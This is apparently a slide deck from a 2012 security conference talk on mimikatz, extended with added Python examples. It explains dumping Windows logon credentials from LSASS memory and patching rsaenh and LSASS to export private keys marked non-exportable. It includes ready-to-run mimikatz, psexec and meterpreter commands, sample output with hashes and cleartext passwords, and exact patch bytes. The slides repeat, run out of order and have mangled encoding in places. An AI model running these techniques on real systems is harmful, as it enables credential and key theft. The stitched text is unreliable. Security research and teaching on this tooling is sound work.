ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz :: crypto::patchcng - bonus
Once one admin has patched LSASS, all users of the current system benefit from the extra exports
 - until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export work too
 - yeah, like the good old certutil
Before the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[...]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

After the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[...]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.
mimikatz :: crypto - memo
Some commands:
  mimikatz crypto::patchcapi crypto::exportCertificates exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
  mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
 - PFX files are protected by this password: mimikatz
Keys
 - When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
 - When you delete a certificate, Windows does not delete its private key... funny, isn't it?
   • So yes, mimikatz can export it
mimikatz :: crypto - what we can do
Exactly the same as for sekurlsa: prevent access to the accounts / the computer
 - no admin, no admin, no admin...
Basics
 - Use smartcards / tokens for users' certificates
 - Use Hardware Security Modules (HSM), even SoftHSM
More in depth
 - See what Microsoft can do with the TPM from Windows 8
   • Virtual SmartCard seems promising
 - Verify vendors' implementations (Lenovo, Dell, ...) of TPM CSP/KSP
   • Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do?
 - Play with minesweeper
 - Manipulate some handles
 - Pass the hash
 - Dump SAM / AD
 - Stop event monitoring
 - Patch Terminal Server
 - Basic GPO bypass
 - AppLocker / SRP bypass
 - Driver
   • Play with tokens & privileges
   • Display SSDT, x86 & x64
   • List minifilters actions
   • List notifications (process, thread, image, registry)
   • List objects hooks and procedures
   • ...
 - ...
mimikatz :: that's all folks
Thanks to / Merci à
 - my girlfriend for her support (her LSASS crashed a few times)
 - the Application Security Forum for offering me this great opportunity
   • Partners and sponsors, for sure
 - Microsoft, for always considering it as normal/acceptable
 - security friends / the community for their ideas & challenges
   • nagual, newsoft, mubix, ...
 - You, for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact
blog     : http://blog.gentilkiwi.com
mimikatz : http://blog.gentilkiwi.com/mimikatz
source   : https://code.google.com/p/mimikatz
email    : benjamin@gentilkiwi.com
mimikatz :: sekurlsa - demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa / kerberos - "hu?"
Ok, it works...
But why?
Not at every logon on NT5 (an unlock may be needed)
From my understanding of Microsoft's explanations:
 - no need of passwords for the Kerberos protocol...
 - all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logical...
 - For password auth
   • the password hash is the shared secret, but the password is kept in memory
 - For full smartcard auth
   • No password on the client
   • No hash on the client
 - NTLM hash on the client...
 - the KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them
 - This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) into the LSASS process, to benefit from its keys when we called it.
Can it be fun to decrypt outside the process?
 - Yes it is... no more injection, just reading the memory of the LSASS process...
mimikatz can use lsasrv.dll too, and "imports" the keys LSASS initialized
 - When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are inside LSASS
mimikatz :: sekurlsa / LsaEncryptMemory - NT5
Depending on the size of the secret, LsaEncryptMemory uses
 - RC4
 - DESX
Key material (globals of lsasrv in lsass, copied by mimikatz into its own lsasrv image):
  g_cbRandomKey : DWORD (256)
  g_pRandomKey  : pointer -> BYTE[g_cbRandomKey]
  g_pDESXKey    : pointer -> BYTE[144]
  g_Feedback    : BYTE[8]
(slide diagram: lsass / lsasrv on one side, mimikatz / lsasrv on the other, with a "copy..." arrow between them)
mimikatz :: sekurlsa / LsaEncryptMemory - NT6
Depending on the size of the secret, LsaEncryptMemory uses
 - 3DES
 - AES
Key material (globals of lsasrv in lsass, copied by mimikatz):
  InitializationVector : BYTE[16]
  h3DesKey             : pointer -> KIWI_BCRYPT_KEY
  hAesKey              : pointer -> KIWI_BCRYPT_KEY
(slide diagram: lsass / lsasrv -> mimikatz, "copy...")

  typedef struct _KIWI_BCRYPT_KEY_DATA {
      DWORD size;
      DWORD tag;
      DWORD type;
      DWORD unk0;
      DWORD unk1;
      DWORD unk2;
      DWORD unk3;
      PVOID unk4;
      BYTE  data;   /* etc. */
  } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

  typedef struct _KIWI_BCRYPT_KEY {
      DWORD size;
      DWORD type;
      PVOID unk0;
      PKIWI_BCRYPT_KEY_DATA cle;
      PVOID unk1;
  } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
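How mimikatz "imports" the NT6 keys, as an added worked example that is not mimikatz code: walk lsasrv!InitializationVector, h3DesKey and hAesKey through the two structures above in a constructed x86 LSASS memory image (a flat byte range stands in for ReadProcessMemory). One assumption the slide does not state: KIWI_BCRYPT_KEY_DATA.size is taken to cover the 32-byte header plus the key bytes. The length rule in cipher_for is the one in mimikatz's reimplementation of LsaEncryptMemory (a multiple of 8 bytes goes to 3DES-CBC with the first 8 IV bytes, anything else to AES-CFB with all 16), which the slide only summarises as "depending on the size of the secret".

```python
"""Follow the lsasrv!InitializationVector / h3DesKey / hAesKey chain out of a
(constructed) LSASS memory image, the way mimikatz "imports" LsaEncryptMemory's
keys without injecting anything.  Added example; not mimikatz source.
Layouts are the x86 (4-byte pointer) structures from the slide."""
import struct

PTR = "<I"                                    # x86 pointer
KEY_FMT = "<IIIII"                            # KIWI_BCRYPT_KEY: size, type, unk0, cle, unk1
KEY_DATA_FMT = "<IIIIIIII"                    # KIWI_BCRYPT_KEY_DATA header: size, tag, type,
KEY_DATA_HDR = struct.calcsize(KEY_DATA_FMT)  #   unk0..unk3, unk4 -> 32 bytes, then 'data'
IV_LEN = 16                                   # lsasrv!InitializationVector is BYTE[16]


class MemoryImage:
    """Stand-in for ReadProcessMemory() on lsass.exe: one flat byte range."""

    def __init__(self, base, data):
        self.base, self.data = base, bytes(data)

    def read(self, addr, n):
        off = addr - self.base
        if off < 0 or off + n > len(self.data):
            raise ValueError(f"read outside image: {addr:#x} + {n}")
        return self.data[off:off + n]

    def read_ptr(self, addr):
        return struct.unpack(PTR, self.read(addr, 4))[0]


def read_bcrypt_key(mem, handle_global):
    """handle_global: address of lsasrv!h3DesKey or lsasrv!hAesKey.  The global
    holds a pointer to a KIWI_BCRYPT_KEY; its 'cle' member points to the
    KIWI_BCRYPT_KEY_DATA whose trailing 'data' is the raw key material."""
    key_ptr = mem.read_ptr(handle_global)
    _size, ktype, _unk0, cle, _unk1 = struct.unpack(
        KEY_FMT, mem.read(key_ptr, struct.calcsize(KEY_FMT)))
    dsize, tag, dtype, *_ = struct.unpack(KEY_DATA_FMT, mem.read(cle, KEY_DATA_HDR))
    # Assumption (the slide shows no length field): KEY_DATA.size covers the
    # 32-byte header plus the key bytes, so the key is size - header.
    key = mem.read(cle + KEY_DATA_HDR, dsize - KEY_DATA_HDR)
    return {"type": ktype, "tag": tag, "data_type": dtype, "key": key}


def import_lsass_keys(mem, iv_global, h3des_global, haes_global):
    """Copy everything LsaEncryptMemory (NT6) needs, as mimikatz does."""
    return {
        "iv": mem.read(iv_global, IV_LEN),
        "3des": read_bcrypt_key(mem, h3des_global)["key"],
        "aes": read_bcrypt_key(mem, haes_global)["key"],
    }


def cipher_for(secret_len):
    """Key/IV choice in mimikatz's reimplementation of LsaEncryptMemory (NT6):
    a length that is a multiple of 8 goes to 3DES-CBC with the first 8 IV
    bytes, anything else to AES-CFB with the full 16-byte IV."""
    return ("3DES", 8) if secret_len % 8 == 0 else ("AES", 16)


# --- constructed LSASS-like image (not a real dump) -------------------------
BASE = 0x74E00000                                     # pretend lsasrv.dll .data
DEMO_IV = bytes(range(IV_LEN))
DEMO_3DES = bytes.fromhex("0123456789abcdef" "fedcba9876543210" "0011223344556677")
DEMO_AES = bytes([0xAA]) * 32
OFF_IV, OFF_H3DES, OFF_HAES = 0x00, 0x10, 0x14        # the three globals
OFF_KEY3, OFF_KEYA = 0x20, 0x40                       # two KIWI_BCRYPT_KEY
OFF_DATA3, OFF_DATAA = 0x60, 0xA0                     # two KIWI_BCRYPT_KEY_DATA


def build_demo_image():
    img = bytearray(0xE0)
    img[OFF_IV:OFF_IV + IV_LEN] = DEMO_IV
    img[OFF_H3DES:OFF_H3DES + 4] = struct.pack(PTR, BASE + OFF_KEY3)
    img[OFF_HAES:OFF_HAES + 4] = struct.pack(PTR, BASE + OFF_KEYA)
    for key_off, data_off, key in ((OFF_KEY3, OFF_DATA3, DEMO_3DES),
                                   (OFF_KEYA, OFF_DATAA, DEMO_AES)):
        img[key_off:key_off + 20] = struct.pack(KEY_FMT, 20, 1, 0, BASE + data_off, 0)
        hdr = struct.pack(KEY_DATA_FMT, KEY_DATA_HDR + len(key), 0, 0, 0, 0, 0, 0, 0)
        img[data_off:data_off + KEY_DATA_HDR + len(key)] = hdr + key
    return MemoryImage(BASE, img)


def demo():
    mem = build_demo_image()
    return import_lsass_keys(mem, BASE + OFF_IV, BASE + OFF_H3DES, BASE + OFF_HAES)


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:>4}: {value.hex()}")
    print(cipher_for(16), cipher_for(9))
```

On a live system the three globals are found by symbol (lsasrv!InitializationVector, lsasrv!h3DesKey, lsasrv!hAesKey, as in the memo slide) and MemoryImage.read becomes ReadProcessMemory on lsass.exe with SeDebugPrivilege; the pointer walk itself does not change.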
mimikatz :: sekurlsa - memo
Security Packages
  Package          Symbols                                Type
  tspkg            tspkg!TSGlobalCredTable                RTL_AVL_TABLE
  wdigest          wdigest!l_LogSessList                  LIST_ENTRY
  livessp          livessp!LiveGlobalLogonSessionList     LIST_ENTRY
  kerberos (nt5)   kerberos!KerbLogonSessionList          LIST_ENTRY
  kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable   RTL_AVL_TABLE
  msv1_0           lsasrv!LogonSessionList                LIST_ENTRY
                   lsasrv!LogonSessionListCount           ULONG
Protection Keys
  Key    NT 5 symbols
  RC4    lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
  DESX   lsasrv!g_pDESXKey, lsasrv!g_Feedback

  Key    NT 6 symbols
         lsasrv!InitializationVector
  3DES   lsasrv!h3DesKey
  AES    lsasrv!hAesKey
mimikatz :: sekurlsa - memo
Some commands:
  mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Request to ENABLE privilege : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentication Id       : 0;234870
Authentication package  : NTLM
Primary user            : Gentil Kiwi
Authentication domain   : vm-w8-rp-x
    msv1_0 :   * User      : Gentil Kiwi
               * Domain    : vm-w8-rp-x
               * LM hash   : d0e9aee149655a6075e4540af1f22d3b
               * NTLM hash : cc36cf7a8514893efccd332446158b1a
    kerberos : * User      : Gentil Kiwi
               * Domain    : vm-w8-rp-x
               * Password  : waza1234
    wdigest :  * User      : Gentil Kiwi
               * Domain    : vm-w8-rp-x
               * Password  : waza1234
    tspkg :    * User      : Gentil Kiwi
               * Domain    : vm-w8-rp-x
               * Password  : waza1234
    livessp :  n.t. (LUID KO)
mimikatz :: sekurlsa - what we can do
Basics
 - No physical access to the computer (first step to pass the hash, then pass the pass)
 - No admin rights / system rights / debug privileges (...)
 - Disable local admin accounts
 - Strong passwords (haha, it was a joke, so useless here ;))
 - For privileged accounts: network logon instead of interactive (when possible)
 - Audit: pass the hash leaves traces and can lock accounts
 - No admin rights / system rights / debug privileges, even for VIPs
 - Use a separate network (or forest) for privileged tasks
More in depth
 - Force strong authentication (SmartCard & Token) $ €
 - Short validity for Kerberos tickets
 - No delegation
 - Disable NTLM (available with NT6)
 - No exotic
   • biometrics (it keeps the password somewhere and pushes it to Windows)
   • single sign on
 - Stop shared secrets for authentication, push public / private stuff (like keys ;))
 - Take the opportunities to stop retro-compatibility
 - Disable faulty providers
   • Is it supported by Microsoft?
   • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto - what is it?
A little module that I wrote to
 - play with the Windows Cryptographic API, CNG and RSA keys
 - automate the export of certificates / keys
   • Even those which are "not" exportable
What the crypto module can do:
 - List
   • Providers
   • Stores
   • Certificates
   • Keys
 - Export
   • Certificates
     - public part in DER format
     - with private keys in PFX format
   • Private keys in PVK format
     - it's cool, OpenSSL can deal with it too
 - Patch
   • CryptoAPI, in mimikatz's context
   • CNG, in LSASS's context (again)
(module: mod_mimikatz_crypto)
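The PVK container named above (the file crypto::exportKeys writes through PrivateKeyBlobToPVK, and the one OpenSSL reads), as an added worked example that is not mimikatz code: wrap a CryptoAPI RSA PRIVATEKEYBLOB in an unencrypted PVK header and parse it back. The slide only names the format; the field layouts below are the public PVK and PRIVATEKEYBLOB layouts, and the RSA key inside is a constructed toy key (p = 61, q = 53) that exists only so the round trip can be checked.

```python
"""PVK = 24-byte header + optional salt + a CryptoAPI key blob.  This is the
file crypto::exportKeys writes (PrivateKeyBlobToPVK) and OpenSSL reads.
Added example, not mimikatz source; the RSA key below is a constructed toy."""
import struct

PVK_MAGIC = 0xB0B5F11E                 # first 4 bytes of every .pvk: 1E F1 B5 B0
AT_KEYEXCHANGE, AT_SIGNATURE = 1, 2    # PVK "keytype" field
PRIVATEKEYBLOB, CUR_BLOB_VERSION = 0x07, 0x02
CALG_RSA_KEYX, CALG_RSA_SIGN = 0x0000A400, 0x00002400
RSA2_MAGIC = 0x32415352                # "RSA2": RSAPUBKEY.magic of a private key blob
PVK_HDR = "<IIIIII"                    # magic, reserved, keytype, is_encrypted, saltlen, keylen


def rsa_privatekeyblob(n, e, d, p, q, bitlen, keyspec=AT_KEYEXCHANGE):
    """BLOBHEADER + RSAPUBKEY + CRT parameters, all little-endian: the layout
    a PRIVATEKEYBLOB export from the RSA CSP has."""
    size, half = bitlen // 8, bitlen // 16
    le = lambda v, width: v.to_bytes(width, "little")
    alg = CALG_RSA_KEYX if keyspec == AT_KEYEXCHANGE else CALG_RSA_SIGN
    return (struct.pack("<BBHI", PRIVATEKEYBLOB, CUR_BLOB_VERSION, 0, alg)
            + struct.pack("<III", RSA2_MAGIC, bitlen, e)
            + le(n, size) + le(p, half) + le(q, half)
            + le(d % (p - 1), half) + le(d % (q - 1), half)   # exponent1, exponent2
            + le(pow(q, -1, p), half)                          # coefficient
            + le(d, size))


def build_pvk(blob, keytype=AT_KEYEXCHANGE):
    """Unencrypted PVK: is_encrypted = 0, no salt."""
    return struct.pack(PVK_HDR, PVK_MAGIC, 0, keytype, 0, 0, len(blob)) + blob


def parse_pvk(data):
    magic, reserved, keytype, encrypted, saltlen, keylen = struct.unpack_from(PVK_HDR, data)
    if magic != PVK_MAGIC or reserved != 0:
        raise ValueError("not a PVK file")
    hdr_len = struct.calcsize(PVK_HDR)
    start = hdr_len + saltlen
    blob = data[start:start + keylen]
    if len(blob) != keylen:
        raise ValueError("truncated PVK")
    return {"keytype": keytype, "encrypted": bool(encrypted),
            "salt": data[hdr_len:start], "blob": blob}


def parse_rsa_privatekeyblob(blob):
    btype, _ver, _res, alg = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, e = struct.unpack_from("<III", blob, 8)
    if btype != PRIVATEKEYBLOB or magic != RSA2_MAGIC:
        raise ValueError("not an RSA PRIVATEKEYBLOB")
    size, half = bitlen // 8, bitlen // 16
    fields, off = {}, 20
    for name, width in (("n", size), ("p", half), ("q", half), ("exp1", half),
                        ("exp2", half), ("coef", half), ("d", size)):
        fields[name] = int.from_bytes(blob[off:off + width], "little")
        off += width
    fields.update(alg=alg, bitlen=bitlen, e=e)
    return fields


# Constructed toy key (never use keys this small): p = 61, q = 53, e = 17.
TOY = dict(n=3233, e=17, d=2753, p=61, q=53, bitlen=32)


def demo():
    """Round trip: blob -> PVK bytes -> parsed blob; returns (pvk, recovered key)."""
    pvk = build_pvk(rsa_privatekeyblob(**TOY))
    key = parse_rsa_privatekeyblob(parse_pvk(pvk)["blob"])
    return pvk, key


if __name__ == "__main__":
    pvk, key = demo()
    print(pvk.hex())
    print(key)
```

A real export written this way is what `openssl rsa -inform PVK -in key.pvk` consumes; an encrypted PVK (is_encrypted = 1, salt present) additionally needs the password-derived RC4 key that OpenSSL prompts for, which this example leaves out.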
mimikatz :: crypto - how it's protected
Private keys are DPAPI protected
 - You cannot reuse private key files on another computer
   • At least not without the master keys and/or the users' passwords
Computer / User can load their own keys because they have enough secrets to do it (e.g. a session is opened)
 - Yes, a computer / server opens a "session"
Export / Usage can be limited by:
 - Password
 - Popup
   (password and popup: a constraint for most users, and unavailable for computer keys)
 - Export / Archive flag not present
   certutil -importpfx mycert.p12 NoExport
   certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto / CAPI - how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
 - http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your_apps_here...) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard reader, ...
 - cryptdll.dll, rsaenh.dll, ...
Processes deal with the cryptographic keys through this API...
mimikatz :: crypto / CAPI - how it's exported (high level)
(slide diagram; CryptoAPI and the RSA CSP run inside the calling process)
  Process -> "ask to export key" -> CryptoAPI / RSA CSP
    -> load private key -> DPAPI decode
    -> Exportable? (the check the slide labels PLAYSKOOL)
         yes -> exported key
         no  -> NTE_BAD_KEY_STATE
mimikatz :: crypto::patchcapi - because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work to prepare the export, and checks whether the key is exportable.

mimikatz # crypto::exportCertificates
Location : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
    Key container : 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider      : Microsoft Enhanced Cryptographic Provider v1.0
    Type          : AT_KEYEXCHANGE
    Exportability : NO
    Key size      : 2048
    Private export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Key not valid for use in specified state.
    Public export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificate 0 ================
Serial Number: 112169417a1c3ef46a301f99385f50680fa0
Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Subject: CN=Benjamin Delpy, C=FR
Non-root Certificate
Cert Hash(sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Key Container = 470ADFBA-8718-4014-B05E-B30776B75A03
  Provider = Microsoft Enhanced Cryptographic Provider v1.0
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.
(slide diagram: the export fails at the "Exportable?" check)
mimikatz :: crypto::patchcapi - because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it.
I wrote "4" bytes in my memory space... (two bytes at each of two sites: 0F 85 becomes 90 E9, and the rel32 displacement stays valid because the 5-byte jmp ends where the 6-byte jnz ended)
before : .text:0AC0B7CB  0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
after  : .text:0AC0B7CB  90                   nop
         .text:0AC0B7CC  E9 33 C7 FF FF       jmp continue_key_export_or_archive
before : .text:0AC1F749  0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
after  : .text:0AC1F749  90                   nop
         .text:0AC1F74A  E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
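The byte-level idea behind this slide's crypto::patchcapi patch and the one-byte crypto::patchcng patch on slide 49, as an added worked example that is not mimikatz code: force the "exportable?" jnz to an unconditional jmp without touching its displacement, and check that the new jump lands where the old one did. It operates on a byte buffer built from the three disassembly snippets on the slides and writes to no process; mimikatz itself locates the sites by pattern in the loaded module rather than by the fixed addresses used here.

```python
"""The byte-level idea behind crypto::patchcapi (slide 43, 4 bytes in rsaenh)
and crypto::patchcng (slide 49, 1 byte in ncrypt inside LSASS): turn the
"not exportable" conditional jump into an unconditional one without touching
its displacement.  Added example working on a byte buffer, not mimikatz code;
it writes to no process.  The three sites below are the slides' disassembly."""

JNZ_SHORT, JMP_SHORT = 0x75, 0xEB        # 75 rel8 / EB rel8 : 2 bytes each
TWO_BYTE_ESC, JNZ_NEAR = 0x0F, 0x85      # 0F 85 rel32       : 6 bytes
NOP, JMP_NEAR = 0x90, 0xE9               # 90, then E9 rel32 : 1 + 5 bytes


def jump_target(code, off, base):
    """Decode the jump at code[off] (code loaded at address base) -> (length, target)."""
    if code[off] in (JNZ_SHORT, JMP_SHORT):
        rel = int.from_bytes(code[off + 1:off + 2], "little", signed=True)
        return 2, base + off + 2 + rel
    if code[off] == TWO_BYTE_ESC and code[off + 1] == JNZ_NEAR:
        rel = int.from_bytes(code[off + 2:off + 6], "little", signed=True)
        return 6, base + off + 6 + rel
    if code[off] == JMP_NEAR:
        rel = int.from_bytes(code[off + 1:off + 5], "little", signed=True)
        return 5, base + off + 5 + rel
    raise ValueError(f"no jnz/jmp at {base + off:#x}")


def force_jump(code, off):
    """Make the jnz at code[off] unconditional.  Returns (patched, bytes_written).
    Short form: 75 -> EB, one byte, the displacement byte is untouched.
    Near form: 0F 85 -> 90 E9, two bytes: the nop pushes the jmp one byte
    later, so the 5-byte jmp ends exactly where the 6-byte jnz ended and the
    rel32 that follows stays valid."""
    code = bytearray(code)
    if code[off] == JNZ_SHORT:
        code[off] = JMP_SHORT
        return bytes(code), 1
    if code[off] == TWO_BYTE_ESC and code[off + 1] == JNZ_NEAR:
        code[off], code[off + 1] = NOP, JMP_NEAR
        return bytes(code), 2
    raise ValueError("not a jnz")


def patch_and_verify(code, off, base):
    """Patch, then check the new jmp lands where the old jnz did."""
    _, before = jump_target(code, off, base)
    patched, written = force_jump(code, off)
    skip = 1 if patched[off] == NOP else 0        # near form: decode after the nop
    _, after = jump_target(patched, off + skip, base)
    if before != after:
        raise AssertionError(f"target moved: {before:#x} -> {after:#x}")
    return patched, written, before


# Disassembly from the slides (address, bytes); each snippet starts at its jnz.
CNG_SITE = (0x6C815210, bytes.fromhex("751C"))                  # ncrypt, patchcng
CAPI_SITES = ((0x0AC0B7CB, bytes.fromhex("0F8533C7FFFF")),      # rsaenh, patchcapi
              (0x0AC1F749, bytes.fromhex("0F85B63BFFFF")))


def demo():
    """-> {site address: (patched hex, bytes written, preserved target)}"""
    out = {}
    for addr, snippet in (CNG_SITE,) + CAPI_SITES:
        patched, written, target = patch_and_verify(snippet, 0, addr)
        out[addr] = (patched.hex(), written, target)
    return out


if __name__ == "__main__":
    for addr, (hexs, written, target) in demo().items():
        print(f"{addr:#010x}: {hexs:<12} ({written} byte(s) written, jumps to {target:#x})")
```

The two rsaenh sites account for the "4 bytes" of patchcapi, the ncrypt site for the single byte of patchcng; in both cases the displacement bytes are never rewritten, which is why the patch survives without any relocation work.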
mimikatz :: crypto::patchcapi - demo time
Import, export, import as not exportable... export.
mimikatz :: crypto::patchcapi - limitations
Because
 - I'm lazy
 - In the majority of real-life cases I've seen RSA keys
   • Elliptic Curve, a little...
mimikatz crypto::patchcapi only deals with
 - Microsoft Base Cryptographic Provider v1.0
 - Microsoft Enhanced Cryptographic Provider v1.0
 - Microsoft Enhanced RSA and AES Cryptographic Provider
 - Microsoft RSA SChannel Cryptographic Provider
 - Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz :: crypto / CNG - how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
 - http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time the key operations are not made in the "user" process context.
Processes use RPC to call the "Key Isolation service" (keyiso) functions.
It seems more secure than CryptoAPI...
 - It is, but it's not perfect...
mimikatz :: crypto / CNG - how it's exported (high level)
(slide diagram; the KeyIso service lives in the LSASS process, which on NT6 is a System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP | SYSTEM_MANDATORY_LABEL_NO_READ_UP)
  Process -> "ask to export key" -> CNG -> RPC -> KeyIso service (LSASS)
    -> load private key -> DPAPI decode
    -> Exportable? (the check the slide labels PLAYSKOOL)
         yes -> exported key
         no  -> NTE_NOT_SUPPORTED
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
